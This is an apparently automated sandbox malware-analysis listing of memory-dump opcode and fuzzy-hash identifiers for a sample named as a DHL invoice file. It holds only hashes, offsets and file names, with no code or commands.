                                                                                                                • Opcode ID: 5084aaf5b7f9969c7bbc759f0689e87e400175e2a5b6238a468af72910f76ca3
                                                                                                                • Instruction ID: 2d79c0315efcc97d4048dbab16c276c286181e7c9dc5ce29000f49ff0e6ce74a
                                                                                                                • Opcode Fuzzy Hash: 5084aaf5b7f9969c7bbc759f0689e87e400175e2a5b6238a468af72910f76ca3
                                                                                                                • Instruction Fuzzy Hash: 9901287081522CCFDB54DF65D95ABDDB7B4BF0A310F1006D9A909A6282DB344AC08F85
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2050337889.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_5c20000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: fefea085135e6a6eaadf5ab2db7e9daef7f3d82b1b9f86355b4164d187d16866
                                                                                                                • Instruction ID: 3a20e62f87a7b3d3545d2df731365666c0cc6e8fc63146dbcb80383631be299e
                                                                                                                • Opcode Fuzzy Hash: fefea085135e6a6eaadf5ab2db7e9daef7f3d82b1b9f86355b4164d187d16866
                                                                                                                • Instruction Fuzzy Hash: 7EF05E39310600AFC714DF19D858D2A77AAFFCC721B114469F9068B3A0CA71EC02DF91
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2050337889.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_5c20000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 4c83880aeef5a0d24a33540a7bf5e6f0918acf317de881c8f3f4de57391ca0a5
                                                                                                                • Instruction ID: 818442f02658cefc0057ca21c5b26ce1208cef33dc710b0a7e47960915f69140
                                                                                                                • Opcode Fuzzy Hash: 4c83880aeef5a0d24a33540a7bf5e6f0918acf317de881c8f3f4de57391ca0a5
                                                                                                                • Instruction Fuzzy Hash: 4AF0A7313443495FC7119A19EC4498BFFAAFFD1264714853AE1594B225DE70E84AC791
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2050337889.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_5c20000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 16957f7db588db62692897d8af512eaeb471af94be286225c44619cd534c87c9
                                                                                                                • Instruction ID: 2e70a3d76163b30a158c59fb18c9005c8cfff5d8010eb5eaf2d71348ac419cd7
                                                                                                                • Opcode Fuzzy Hash: 16957f7db588db62692897d8af512eaeb471af94be286225c44619cd534c87c9
                                                                                                                • Instruction Fuzzy Hash: E4F0302670C3814FC7125635A8642993FB19F6750430B549AD4C1CB356D9289D0A8B11
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2050306783.0000000005C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C10000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_5c10000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: d69480a60a06648e3615902927cdaad8ada32811e13bf3bb0e546e6853e02298
                                                                                                                • Instruction ID: 4f6b7207326aa62c3a35d4197a65a6170b950a2c64abdcf0edf150ab24cdb796
                                                                                                                • Opcode Fuzzy Hash: d69480a60a06648e3615902927cdaad8ada32811e13bf3bb0e546e6853e02298
                                                                                                                • Instruction Fuzzy Hash: D401DD34904218DFDB14CF64E888BA9BBB2FB4A304F5084A6E81EA7251CB705A85DF44
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2050306783.0000000005C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C10000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_5c10000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 1839946d5330b3fd8b727ec203c1c54f3c13f1489c04d4b389047583293bd795
                                                                                                                • Instruction ID: 94fd5be6ee8c11e7c977b4deceaa0b6ab9e43f1232a00ed64cb42fc1df9e7917
                                                                                                                • Opcode Fuzzy Hash: 1839946d5330b3fd8b727ec203c1c54f3c13f1489c04d4b389047583293bd795
                                                                                                                • Instruction Fuzzy Hash: EBF036719082C5AFC755CF98D8409ADBFF5AB1A311F14C5CAA8649B292C6359A41DB10
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2036075757.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a50000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 18c718ea2a4dccff5ffbdd0f4ec599b11745fdd5f67e602d90dd88b01ccf05af
                                                                                                                • Instruction ID: 7206aff9e33cb40ff635beaaaedc69f1944ffceaf95877385c2ae9003093f510
                                                                                                                • Opcode Fuzzy Hash: 18c718ea2a4dccff5ffbdd0f4ec599b11745fdd5f67e602d90dd88b01ccf05af
                                                                                                                • Instruction Fuzzy Hash: 99F0153834C3848FDB05DB74EAA8A593FB1AF4A700F2501EAE841CB3B2C664DC00CB11
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2050337889.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_5c20000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 639974685a4419316679b6caf1f54cd7ff3cb585d551e9a3556beb79be2dcad7
                                                                                                                • Instruction ID: 679fdeb77806145fe78e940d15cd6c4ec19bbcec95496ea07bf06036c4c29aad
                                                                                                                • Opcode Fuzzy Hash: 639974685a4419316679b6caf1f54cd7ff3cb585d551e9a3556beb79be2dcad7
                                                                                                                • Instruction Fuzzy Hash: 8CF08276A145549FDF19CF68D0887DCBFB3FF84205F0884A9E04997245DB705686CF84
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2050337889.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_5c20000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 2c35a2dcd5923065885d06a677f89298e0c86a869be6645a1406e0dc384ee88a
                                                                                                                • Instruction ID: 032e50a958b500f9658952476d0504248c2640d4505bab59873a0a9d9e4f47bc
                                                                                                                • Opcode Fuzzy Hash: 2c35a2dcd5923065885d06a677f89298e0c86a869be6645a1406e0dc384ee88a
                                                                                                                • Instruction Fuzzy Hash: 64F08C70E0D288EFC740DFA8C84029CBFF0EB4A210F1884EED809D3352D635AA05DB41
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2050306783.0000000005C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C10000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_5c10000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: a49913d15faf70681ef20e6c148ea65c201c7a8cfb56749f6951ddc6e3918862
                                                                                                                • Instruction ID: 50e40ce129628e7541878f2d4ec07bea4e3904aa7fe07497328b68a0416761f2
                                                                                                                • Opcode Fuzzy Hash: a49913d15faf70681ef20e6c148ea65c201c7a8cfb56749f6951ddc6e3918862
                                                                                                                • Instruction Fuzzy Hash: AB013C30809A68CFDB20CF14DC88B99B7B2FF46306F1005D5D80A6A245C7744EC5DF0A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2050306783.0000000005C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C10000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_5c10000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 1a08aa6f28a8d61c8ff221efa0e75d383de6a9e1428af2d7605d56f3560e740c
                                                                                                                • Instruction ID: 7790764963d2efc8b92fdfe8d21efe23abc2171d5e4f1f52abf236feba884a40
                                                                                                                • Opcode Fuzzy Hash: 1a08aa6f28a8d61c8ff221efa0e75d383de6a9e1428af2d7605d56f3560e740c
                                                                                                                • Instruction Fuzzy Hash: FCF01C74D08248EFCB84DFA9D840AADBBF8AB49310F14C49AAC58D7341D6359B51EF50
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2050337889.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_5c20000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: f3060ad7d1a87c1ed093a7b81db232caf9f06d42db4f9d4940c8edfff15be6a8
                                                                                                                • Instruction ID: 28ad0b6b9df078a46d412ef21cd229828ea1bd283634e6bfe2315fd0c02ab02f
                                                                                                                • Opcode Fuzzy Hash: f3060ad7d1a87c1ed093a7b81db232caf9f06d42db4f9d4940c8edfff15be6a8
                                                                                                                • Instruction Fuzzy Hash: 5BE0D871B483908FDB21D6708D063653B716F1AA51F9908EEC1969F385DC61D841C721
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2050337889.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_5c20000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 30e0ad4d8dad21156fc4c616e3ec3dc542c09918b6815c3204d1680f6ad4e10a
                                                                                                                • Instruction ID: ced7c0dff9232c1edaeb83f22d08332be8d61fa8639bcdb5b1f2061226720eb5
                                                                                                                • Opcode Fuzzy Hash: 30e0ad4d8dad21156fc4c616e3ec3dc542c09918b6815c3204d1680f6ad4e10a
                                                                                                                • Instruction Fuzzy Hash: E8F0E57590D244EFC701CFA4D84499CBF75AB42304F14909AD84067352D6319A02DB91
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2036075757.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a50000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 5ebe12f359d4d601cc2aa15baeb5175aa3a7bc26e963c5e94d79e32e854ab389
                                                                                                                • Instruction ID: c67efd3eba2fcd080c8fe88c0a067775a1d70ffe3279976777eadd4dca01c25b
                                                                                                                • Opcode Fuzzy Hash: 5ebe12f359d4d601cc2aa15baeb5175aa3a7bc26e963c5e94d79e32e854ab389
                                                                                                                • Instruction Fuzzy Hash: 96018C74918228CFDB68DF24DD987A8BBF1BB59311F0488D9D84AA2350DB700E84DF80
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2050337889.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_5c20000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 259e5e88b0be6950fb9d41924cbfc5bd1958e71e032d8fc081323c7c4d38f4a3
                                                                                                                • Instruction ID: c1d8309b85f61e535a733120fa94d64e45f2a4c05524624f5cf8c72a143b8d77
                                                                                                                • Opcode Fuzzy Hash: 259e5e88b0be6950fb9d41924cbfc5bd1958e71e032d8fc081323c7c4d38f4a3
                                                                                                                • Instruction Fuzzy Hash: 0EF06575A14618AFDF19CF54D4886DDBFB7FB84210F0484A9E00A97240DFB45A81CBC4
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2050337889.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_5c20000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 180fdb77fd4a20b42c9b6cda290b52d849e8a17bb618d960509a62ddccacde1d
                                                                                                                • Instruction ID: f47e8509988b5df6901b6168bf15b9d591720ebd20efe16b54c0fb86bb243167
                                                                                                                • Opcode Fuzzy Hash: 180fdb77fd4a20b42c9b6cda290b52d849e8a17bb618d960509a62ddccacde1d
                                                                                                                • Instruction Fuzzy Hash: 8BF0ED71A0D208EFCB01CFA8E88059DBFB5AB16300F1480DAE880A7352C631AE45DB91
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2050337889.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_5c20000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: b6f1931964e631ddb75c69a23d553364c8eeea0b96089b35445c68489602b207
                                                                                                                • Instruction ID: f4faeabe295f6f9011c5923fe557112b5267895c3ac9dfc6f0f7df38496811c1
                                                                                                                • Opcode Fuzzy Hash: b6f1931964e631ddb75c69a23d553364c8eeea0b96089b35445c68489602b207
                                                                                                                • Instruction Fuzzy Hash: 5BE012313402055FC7149A1AE984C4BFB9AEEC42647109539E11A87225DE70ED498691
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2036075757.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a50000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: a2a319f6f33b466a301b5c621fdf8034f43946dd9c19b143b8d3c6ceb6504d34
                                                                                                                • Instruction ID: b6bae805038f85480e234e136c092cf43d756559542536a098f14ff30a689b19
                                                                                                                • Opcode Fuzzy Hash: a2a319f6f33b466a301b5c621fdf8034f43946dd9c19b143b8d3c6ceb6504d34
                                                                                                                • Instruction Fuzzy Hash: 60E09238340200CFC744EB64EA99E1A3BE5AF48711F1101A4E906CB7B6DAB1EC008B51
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2036075757.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a50000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: bcd8c1e4fdc77e088253a53dc4bbc208d6ecdc665a38b216e41d423dd7de30fe
                                                                                                                • Instruction ID: 6376238f9aa79555147759571023a5643db08cd1babe3b37f105ad5fd374bf92
                                                                                                                • Opcode Fuzzy Hash: bcd8c1e4fdc77e088253a53dc4bbc208d6ecdc665a38b216e41d423dd7de30fe
                                                                                                                • Instruction Fuzzy Hash: 31F05E30D052548EDB608B25C94469D7E72AB4A395F0591DAC80A7B691C6305AC9DF46
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2050914473.0000000006230000.00000040.00000800.00020000.00000000.sdmp, Offset: 06230000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_6230000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 0b4cac1759431995044b28e8f65c6eb1da1aead6bd1a86cd9d84554d1a81f4d2
                                                                                                                • Instruction ID: f360a3a6c1e7eb1248ea45fc2a2f1f73bcb3592b9a04cfd601ce5aee525d9858
                                                                                                                • Opcode Fuzzy Hash: 0b4cac1759431995044b28e8f65c6eb1da1aead6bd1a86cd9d84554d1a81f4d2
                                                                                                                • Instruction Fuzzy Hash: DDF0FE74611228CFDB68EF14C999B5AB7F6FB89300F0080D5A51DA7399CB34AE848F11
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2050914473.0000000006230000.00000040.00000800.00020000.00000000.sdmp, Offset: 06230000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_6230000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: e3f16d3124b1a689f4c776739a03c08d2d400bda955f11226b85d8b64eeb4519
                                                                                                                • Instruction ID: da6fd4468fd79d582fa65dced9aa94f6654b5804eabd6144c34758e33a3b9d95
                                                                                                                • Opcode Fuzzy Hash: e3f16d3124b1a689f4c776739a03c08d2d400bda955f11226b85d8b64eeb4519
                                                                                                                • Instruction Fuzzy Hash: DBE0C974E18208EFCB84DFA8D44069CFBF4EB48310F10C4A9EC0893351DA719A51DF80
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2050914473.0000000006230000.00000040.00000800.00020000.00000000.sdmp, Offset: 06230000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_6230000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: e3f16d3124b1a689f4c776739a03c08d2d400bda955f11226b85d8b64eeb4519
                                                                                                                • Instruction ID: 68090deb07dfe7ecc07c295af06ff43100f609cf966e7b97849e292d5b094722
                                                                                                                • Opcode Fuzzy Hash: e3f16d3124b1a689f4c776739a03c08d2d400bda955f11226b85d8b64eeb4519
                                                                                                                • Instruction Fuzzy Hash: DAE0C974E19208EFCB84DFA9D44069CFBF4EB48310F10C0A9AC1893355DA329E51EF80
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2050914473.0000000006230000.00000040.00000800.00020000.00000000.sdmp, Offset: 06230000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_6230000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: e3f16d3124b1a689f4c776739a03c08d2d400bda955f11226b85d8b64eeb4519
                                                                                                                • Instruction ID: a72ca7b002f85c3bc27f757712ed1995b2926b45196d625fdc0dc035f908341e
                                                                                                                • Opcode Fuzzy Hash: e3f16d3124b1a689f4c776739a03c08d2d400bda955f11226b85d8b64eeb4519
                                                                                                                • Instruction Fuzzy Hash: 4BE0C9B4E19208EFCB84DFA8D44069CFBF4EB48310F10C0A9AC59A3350D6769A51DF80
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2036075757.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a50000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: a444b0a268ff6b0374613074281194462e06cbf01c4fe89e861ef3d39928b8cf
                                                                                                                • Instruction ID: a0d2db42a72db530cbe8ff4c4d145224243f17035f64efda6df75f9bf893dcd6
                                                                                                                • Opcode Fuzzy Hash: a444b0a268ff6b0374613074281194462e06cbf01c4fe89e861ef3d39928b8cf
                                                                                                                • Instruction Fuzzy Hash: 79F0DF7489022BCFDB659F20CC89BE9B7B0BB05340F0041F5E90AA2250D7300E858F40
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2050337889.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_5c20000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 50e51abed8e07139533765bfdd4fbdfc91bf39367d8bf47ee36ccf1fad34736e
                                                                                                                • Instruction ID: e27f170865c65e9743d1ee889c900f62d8cf0d8b8ef810950f47e5117e63f3e0
                                                                                                                • Opcode Fuzzy Hash: 50e51abed8e07139533765bfdd4fbdfc91bf39367d8bf47ee36ccf1fad34736e
                                                                                                                • Instruction Fuzzy Hash: C9E092B1A09244DFC701DBA8EA0139D7BB0EB86300B1541D9E408D7351DA302F04AB62
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2050337889.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_5c20000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: c552d88906143755bcac31fa8cddda8d9ea45b3c21ee440aabc95b03b180956a
                                                                                                                • Instruction ID: 511297be556202814830a0569a4993dd438feca3e3865a96f2a50df08ad948e5
                                                                                                                • Opcode Fuzzy Hash: c552d88906143755bcac31fa8cddda8d9ea45b3c21ee440aabc95b03b180956a
                                                                                                                • Instruction Fuzzy Hash: 79E0B6B181D3C09FC34356748C1558A3F25ABA321171B45EFD4A18F2A7D6155947DB22
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2050914473.0000000006230000.00000040.00000800.00020000.00000000.sdmp, Offset: 06230000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_6230000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 734cc3544a5f207672d90c599f2a7090a8b776f06bdff5a3bd4b0fd0cd08edd2
                                                                                                                • Instruction ID: 8f848a2a2ffd4dda2c8ca04f0724015d9f608ed01edc0114b341ab7fce0ef4a9
                                                                                                                • Opcode Fuzzy Hash: 734cc3544a5f207672d90c599f2a7090a8b776f06bdff5a3bd4b0fd0cd08edd2
                                                                                                                • Instruction Fuzzy Hash: 38F05E70900129CFEB28DF54D5487DAB3F1EB05304F1080E6D948A3640DB344F809F11
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2050306783.0000000005C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C10000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_5c10000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 0c2379a54518ae4217c95dff4c17a6563e5d8c3622668fd96b4cfc7f5d9602eb
                                                                                                                • Instruction ID: 2fadc48f7fb4a5628093a10e08fca0b359ff88d877eb0ce963b93d41cf6b8c5c
                                                                                                                • Opcode Fuzzy Hash: 0c2379a54518ae4217c95dff4c17a6563e5d8c3622668fd96b4cfc7f5d9602eb
                                                                                                                • Instruction Fuzzy Hash: 38F0B2B4A442288FCF64EF64D895AAEBBBAAB49304F1005E9C60DA7354DB315EC1CF44
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2050337889.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_5c20000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 2b5504507e9d5f5cfd7df5bf2e5dc963bd439da8655c91de9d4cf3b0e8275564
                                                                                                                • Instruction ID: 953f3b2939ca0372301c5f533bea66dd3bb229ef8e4af5de5d15dc37570ced89
                                                                                                                • Opcode Fuzzy Hash: 2b5504507e9d5f5cfd7df5bf2e5dc963bd439da8655c91de9d4cf3b0e8275564
                                                                                                                • Instruction Fuzzy Hash: BDE0E574E08208EFCB84DFA9D4806ACFBF4EB48310F24C4A9980993340D635AA42DF41
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2050337889.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_5c20000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 06db85714543278a2e2b79f099a10327711d6bbb883f826f20d6433202fca09a
                                                                                                                • Instruction ID: 76fd4d56cedfb52ed3a4dc392460a8466f25c19f8bc1106581007c2cd8fdae24
                                                                                                                • Opcode Fuzzy Hash: 06db85714543278a2e2b79f099a10327711d6bbb883f826f20d6433202fca09a
                                                                                                                • Instruction Fuzzy Hash: 5AE08C363501109F8318DA4EE484C6B3BEDEFD9B62304006AF106CB220CE70EC01CB90
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2050914473.0000000006230000.00000040.00000800.00020000.00000000.sdmp, Offset: 06230000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_6230000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 5d895c6dfa3da47f38def994e450e276f939d4eb26db92884cd05759bde1faa1
                                                                                                                • Instruction ID: 02a84f76cf2e96395969c4b54a4404e6f385b0d74ba1fceef5721d4091ea5b49
                                                                                                                • Opcode Fuzzy Hash: 5d895c6dfa3da47f38def994e450e276f939d4eb26db92884cd05759bde1faa1
                                                                                                                • Instruction Fuzzy Hash: 93E04F74D18108ABC744EF94E9409ADBBB8EB85310F209499AC4457381CA319A51DB94
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2050306783.0000000005C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C10000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_5c10000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: e192b994a9c9857138d06ecef11e9831f22011d8c3b3e8f60976a28231d73ffd
                                                                                                                • Instruction ID: 96d9efb3671d1e87d80dd553300ade413fd5f1bd3490834e61efc1e2e93fd754
                                                                                                                • Opcode Fuzzy Hash: e192b994a9c9857138d06ecef11e9831f22011d8c3b3e8f60976a28231d73ffd
                                                                                                                • Instruction Fuzzy Hash: EFE01A70D0920CEFCB54DFA8D44529DBBB9EB45300F1084A9DC0893300D6355A40DF40
